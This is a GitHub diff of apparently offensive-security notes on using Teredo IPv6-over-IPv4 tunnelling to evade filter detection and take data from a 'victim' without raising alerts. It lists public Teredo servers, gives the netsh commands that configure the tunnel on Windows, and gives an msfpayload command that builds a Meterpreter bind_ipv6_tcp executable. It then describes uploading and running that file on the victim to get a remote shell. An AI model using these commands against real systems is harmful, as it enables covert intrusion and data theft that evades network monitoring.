You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Creating a teredo tunnel to allow a remote victim to tunnel IPv6 packets over IPv4 may allow you to evade some
191
+
filter detection systems and extract information from a victim without triggering alerts on the target network.
192
+
193
+
In order to do this one needs to use a teredo server which will convert IPv4 packets to IPv6 packets and vice versa.
194
+
Several publicly available servers are available including:
195
+
196
+
* teredo.trex.fi
197
+
* teredo.remlab.net
198
+
* teredo-debian.remlab.net
199
+
* teredo.ngix.ne.kr
200
+
* win8.ipv6.microsoft.com (This may be shaky on Windows 7, so don't rely on it)
201
+
202
+
To set up a tunnel, issue the following commands:
203
+
204
+
```
205
+
netsh interface ipv6 install
206
+
netsh interface ipv6 teredo enterpriseclient
207
+
netsh interface ipv6 teredo set client teredo.trex.fi
208
+
msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=5555 X > bind.exe
209
+
```
210
+
211
+
All we have to do at this point is upload the resulting bind.exe payload to the victim, execute it, and then set up
212
+
metasploit to connect to the public IPv6 address that the victim was assigned on the specified port (5555 in this example), and we should now be able to get a meterpreter shell using teredo tunneling :)
0 commit comments